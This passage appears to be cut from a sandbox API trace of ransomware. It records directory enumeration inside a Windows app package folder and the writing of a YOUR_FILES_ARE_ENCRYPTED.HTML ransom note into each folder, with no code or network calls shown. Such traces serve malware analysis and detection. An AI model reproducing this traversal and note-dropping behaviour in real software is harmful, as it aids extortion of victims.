pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp") returned 91 [0115.632] GetProcessHeap () returned 0x600000 [0115.632] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.633] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp" [0115.633] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp\\*" [0115.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.633] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 1 [0115.633] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d4b8, dwReserved1=0x62f200, cFileName="..", cAlternateFileName="")) returned 0 [0115.633] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.633] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.633] GetProcessHeap () returned 0x600000 [0115.633] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.634] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.634] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.635] CloseHandle (hObject=0x324) returned 1 [0115.635] GetProcessHeap () returned 0x600000 [0115.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.635] GetProcessHeap () returned 0x600000 [0115.635] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.636] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1363df03, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1363df03, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1363df03, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.636] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.636] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0115.636] GetProcessHeap () returned 0x600000 [0115.636] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.637] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.637] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.638] CloseHandle (hObject=0x32c) returned 1 [0115.638] GetProcessHeap () returned 0x600000 [0115.638] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.638] GetProcessHeap () returned 0x600000 [0115.638] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.638] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1344e05e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1344e05e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1344e05e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.638] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.638] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData") returned 91 [0115.638] GetProcessHeap () returned 0x600000 [0115.638] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.638] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData" [0115.639] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData\\*" [0115.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1344e05e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1344e05e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1344e05e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.639] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1344e05e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1344e05e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1344e05e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.639] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1344e05e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1344e05e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1344e05e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 0 [0115.639] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0115.639] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.639] GetProcessHeap () returned 0x600000 [0115.639] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.640] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.641] CloseHandle (hObject=0x32c) returned 1 [0115.641] GetProcessHeap () returned 0x600000 [0115.641] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.641] GetProcessHeap () returned 0x600000 [0115.641] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.642] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b3c066a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b3c066a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.642] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.642] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache") returned 94 [0115.642] GetProcessHeap () returned 0x600000 [0115.642] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.643] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache" [0115.643] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache\\*" [0115.643] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b3c066a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b3c066a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.644] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b3c066a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x2b3c066a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.644] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d2da7be, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1d2da7be, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x67d943e3, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="CallsBackgroundTaskLog.etl", cAlternateFileName="CALLSB~1.ETL")) returned 1 [0115.644] StrStrIW (lpFirst="CallsBackgroundTaskLog.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.644] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache\\CallsBackgroundTaskLog.etl") returned 121 [0115.644] PathFindExtensionW (pszPath="CallsBackgroundTaskLog.etl") returned=".etl" [0115.644] lstrlenW (lpString=".etl") returned 4 [0115.644] PathFindExtensionW (pszPath="CallsBackgroundTaskLog.etl") returned=".etl" [0115.644] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3c066a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b3c066a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d80d6b4, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="CallsBackgroundTaskLog.last.etl", cAlternateFileName="CALLSB~2.ETL")) returned 1 [0115.644] StrStrIW (lpFirst="CallsBackgroundTaskLog.last.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.644] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache\\CallsBackgroundTaskLog.last.etl") returned 126 [0115.644] PathFindExtensionW (pszPath="CallsBackgroundTaskLog.last.etl") returned=".etl" [0115.644] lstrlenW (lpString=".etl") returned 4 [0115.644] PathFindExtensionW (pszPath="CallsBackgroundTaskLog.last.etl") returned=".etl" [0115.644] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b3c066a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2b3c066a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d80d6b4, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="CallsBackgroundTaskLog.last.etl", cAlternateFileName="CALLSB~2.ETL")) returned 0 [0115.644] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.644] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.644] GetProcessHeap () returned 0x600000 [0115.644] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.647] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.649] CloseHandle (hObject=0x32c) returned 1 [0115.649] GetProcessHeap () returned 0x600000 [0115.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.649] GetProcessHeap () returned 0x600000 [0115.649] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.650] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0115.650] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.650] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState") returned 94 [0115.650] GetProcessHeap () returned 0x600000 [0115.650] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.651] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState" [0115.651] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState\\*" [0115.651] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626878 [0115.651] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.651] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 0 [0115.652] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0115.652] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0115.652] GetProcessHeap () returned 0x600000 [0115.652] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.653] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.654] CloseHandle (hObject=0x32c) returned 1 [0115.654] GetProcessHeap () returned 0x600000 [0115.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.655] GetProcessHeap () returned 0x600000 [0115.655] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.655] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15621741, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x15621741, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x15621741, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.CommsPhone_1.10.15000.0_x64__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_X")) returned 1 [0115.655] StrStrIW 